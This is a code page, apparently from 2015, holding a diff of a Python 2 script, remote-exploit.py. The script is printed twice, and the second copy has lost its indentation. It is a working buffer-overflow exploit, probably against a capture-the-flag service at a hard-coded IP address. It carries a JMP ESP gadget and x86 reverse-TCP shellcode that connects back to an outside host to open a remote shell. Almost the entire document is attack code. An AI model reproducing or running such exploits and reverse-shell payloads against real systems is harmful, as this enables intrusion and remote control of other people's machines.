DonnchaC · August 29, 2015 14:19
diff --git a/remote-exploit.py b/remote-exploit.py
 #!/usr/bin/env python2
 try:
    import binexpect
 except ImportError:
    exit("""
 pexpect sucks for sending binary data. binexpect fixes this and can be
 found at this url: http:#darksaber.tk/wapiflapi/binexpect.py Not sure
 if the file will be there for ever, but you don't need this anyway.
 """)


 def encode(num):
    v8 = 0
    v4 = 0
    for v8 in range(0, 8):
        v4 = v4 << 4
        v4 += 10
    return v4 ^ num


 def reverse_tcp_shellcode(ip='127.1.1.1', port=1337):
    import socket
    import struct

    shellcode = (
        "\x6a\x66\x58\x6a\x01\x5b\x31\xd2"
        "\x52\x53\x6a\x02\x89\xe1\xcd\x80"
        "\x92\xb0\x66\x68" + socket.inet_aton(ip) +
        "\x66\x68" + struct.pack(">H", int(port)) + "\x43\x66\x53\x89"
        "\xe1\x6a\x10\x51\x52\x89\xe1\x43"
        "\xcd\x80\x6a\x02\x59\x87\xda\xb0"
        "\x3f\xcd\x80\x49\x79\xf9\xb0\x0b"
        "\x41\x89\xca\x52\x68\x2f\x2f\x73"
        "\x68\x68\x2f\x62\x69\x6e\x89\xe3"
        "\xcd\x80"
    )
    return shellcode

 if __name__ == '__main__':

    # target = binexpect.spawn("nc localhost 8888", timeout=None)
    target = binexpect.spawn("nc 23.25.135.4 1984", timeout=None)

    target.expect('The answer is (\d*).')
    answer = int(target.match.group(1))
    target.sendline(str(encode(answer)))

    target.expect('The dungeon shakes')
    # Passed the question successfully, craft the payload

    # 256 bytes read from input, allowing overflow of the buffer.
    # 0x08048640 JMP $esp - Gadget to jump to shellcode at $ESP
    payload = (78 * 'A') + "\x40\x86\x04\x08"
    payload += reverse_tcp_shellcode(ip='188.166.53.117')

    print("Sending payload")
    target.sendbinline(payload)

    target.interact()
	#!/usr/bin/env python2
	try:
	import binexpect
	except ImportError:
	exit("""
	pexpect sucks for sending binary data. binexpect fixes this and can be
	found at this url: http:#darksaber.tk/wapiflapi/binexpect.py Not sure
	if the file will be there for ever, but you don't need this anyway.
	""")


	def encode(num):
	v8 = 0
	v4 = 0
	for v8 in range(0, 8):
	v4 = v4 << 4
	v4 += 10
	return v4 ^ num


	def reverse_tcp_shellcode(ip='127.1.1.1', port=1337):
	import socket
	import struct

	shellcode = (
	"\x6a\x66\x58\x6a\x01\x5b\x31\xd2"
	"\x52\x53\x6a\x02\x89\xe1\xcd\x80"
	"\x92\xb0\x66\x68" + socket.inet_aton(ip) +
	"\x66\x68" + struct.pack(">H", int(port)) + "\x43\x66\x53\x89"
	"\xe1\x6a\x10\x51\x52\x89\xe1\x43"
	"\xcd\x80\x6a\x02\x59\x87\xda\xb0"
	"\x3f\xcd\x80\x49\x79\xf9\xb0\x0b"
	"\x41\x89\xca\x52\x68\x2f\x2f\x73"
	"\x68\x68\x2f\x62\x69\x6e\x89\xe3"
	"\xcd\x80"
	)
	return shellcode

	if __name__ == '__main__':

	# target = binexpect.spawn("nc localhost 8888", timeout=None)
	target = binexpect.spawn("nc 23.25.135.4 1984", timeout=None)

	target.expect('The answer is (\d*).')
	answer = int(target.match.group(1))
	target.sendline(str(encode(answer)))

	target.expect('The dungeon shakes')
	# Passed the question successfully, craft the payload

	# 256 bytes read from input, allowing overflow of the buffer.
	# 0x08048640 JMP $esp - Gadget to jump to shellcode at $ESP
	payload = (78 * 'A') + "\x40\x86\x04\x08"
	payload += reverse_tcp_shellcode(ip='188.166.53.117')

	print("Sending payload")
	target.sendbinline(payload)

	target.interact()